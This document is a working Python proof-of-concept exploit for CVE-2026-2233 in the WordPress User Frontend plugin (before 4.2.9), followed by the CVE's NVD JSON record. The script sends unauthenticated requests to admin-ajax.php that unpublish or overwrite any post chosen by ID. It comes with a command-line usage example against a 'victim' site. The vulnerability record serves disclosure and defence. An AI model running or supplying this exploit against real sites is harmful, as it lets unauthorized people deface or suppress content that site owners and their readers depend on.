CVE-2026-2233

import requests import sys # CVE-2026-2233 PoC - Unauthenticated Arbitrary Post Modification # Target: WordPress User Frontend Plugin < 4.2.9 def exploit(target_url, post_id, action='unpublish'): """ Exploit the missing capability check in draft_post() function Args: target_url: Base URL of the WordPress site post_id: ID of the post to modify action: 'unpublish' to unpublish the post, 'overwrite' to change content """ endpoint = f"{target_url}/wp-admin/admin-ajax.php" if action == 'unpublish': # Unpublish the target post by changing status to draft data = { 'action': 'wpuf_draft_post', 'post_id': post_id, 'post_status': 'draft' } elif action == 'overwrite': # Overwrite post content data = { 'action': 'wpuf_draft_post', 'post_id': post_id, 'post_title': 'Compromised by CVE-2026-2233', 'post_content': 'This post has been modified by an unauthenticated attacker.' } print(f"[*] Sending exploit request to {endpoint}") print(f"[*] Target Post ID: {post_id}") print(f"[*] Action: {action}") try: response = requests.post(endpoint, data=data, timeout=10) print(f"[+] Response Status: {response.status_code}") print(f"[+] Response: {response.text[:500]}") if response.status_code == 200: print("[!] Exploit sent - verify post modification manually") except Exception as e: print(f"[-] Error: {e}") sys.exit(1) if __name__ == "__main__": if len(sys.argv) < 3: print(f"Usage: python {sys.argv[0]} <target_url> <post_id> [action]") print("Example: python exploit.py http://victim.com 123 unpublish") sys.exit(1) target = sys.argv[1] post_id = sys.argv[2] action = sys.argv[3] if len(sys.argv) > 3 else 'unpublish' exploit(target, post_id, action)

{"cve": {"id": "CVE-2026-2233", "sourceIdentifier": "[email protected]", "published": "2026-03-16T14:19:28.950", "lastModified": "2026-04-22T21:30:26.497", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The User Frontend: AI Powered Frontend Posting, User Directory, Profile, Membership & User Registration plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the draft_post() function in all versions up to, and including, 4.2.8. This makes it possible for unauthenticated attackers to modify arbitrary posts (e.g. unpublish published posts and overwrite the contents) via the 'post_id' parameter."}, {"lang": "es", "value": "El plugin User Frontend: AI Powered Frontend Posting, User Directory, Profile, Membership &amp; User Registration para WordPress es vulnerable a la modificación no autorizada de datos debido a una comprobación de capacidad faltante en la función draft_post() en todas las versiones hasta la 4.2.8, inclusive. Esto hace posible que atacantes no autenticados modifiquen publicaciones arbitrarias (por ejemplo, despublicar publicaciones ya publicadas y sobrescribir el contenido) a través del parámetro 'post_id'."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset/3468395/wp-user-frontend", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/e0a278a3-f229-4673-8b3e-5b68f383dcc7?source=cve", "source": "[email protected]"}]}}